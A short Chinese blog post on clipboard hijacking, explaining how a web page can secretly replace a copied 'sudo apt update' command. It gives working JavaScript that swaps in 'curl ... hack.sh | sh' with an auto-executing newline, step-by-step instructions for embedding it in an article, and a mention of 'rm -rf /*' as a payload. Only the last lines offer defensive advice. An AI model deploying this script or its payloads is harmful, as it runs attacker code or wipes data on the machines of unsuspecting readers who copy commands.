目录导航
假设您正在搜索如何更新您的 ubuntu,并且您找到了这个命令行。然后你复制它:
试试看 – 复制下面的命令,然后粘贴到其他地方:
sudo apt update
这是问题所在: 您是否看到它自动添加了一个新行。当这种情况发生在终端中时,它将自动执行命令!
此时你如果把这个命令粘贴进去,黑客可能就会直接拿到你服务器权限.
这就是为什么你永远不应该将粘贴命令直接复制到你的终端中。询问任何开发人员或管理员是否曾经从网上复制过命令行或代码片段。答案可能是肯定的。您会假设您复制的内容就是您粘贴的内容,对吗?也许似乎大概是,然而未必不见得!
你认为你在复制一个东西,但它被其他东西取代了,比如恶意代码。只需将一行代码注入您复制的代码中即可创建应用程序的后门。
这种攻击非常简单,但也非常有害。下面是它的工作原理:
原理
原理很简单,就是一串简单的JavaScript代码
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl https://www.ddosi.org:8000/hack.sh | sh\n'); e.preventDefault(); });
</script>使用方法
①文章中插入此js代码
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl https://www.ddosi.org:8000/hack.sh | sh\n'); e.preventDefault(); });
</script>②将要进行修改的代码放入文章中,html格式如下:
<p><strong><span id="copy" style="background-color: #f8f8f8;"><code>sudo apt update</code></span></strong></p>③此时别人复制 sudo apt update就会变成我设置好的sh命令,最关键的是sh命令后面还带有 \n ,也就是说,你粘贴进去服务器那一刻,就已经自动回车执行了,你根本没机会进行补救,如果我的命令是 rm -rf /* 呢?
如何避免这种情况?
最安全的方法是不要将您从网络上复制的任何内容粘贴到终端中。也可以将许多终端配置为在粘贴“\n”(新行)时不自动执行.
转载请注明出处及链接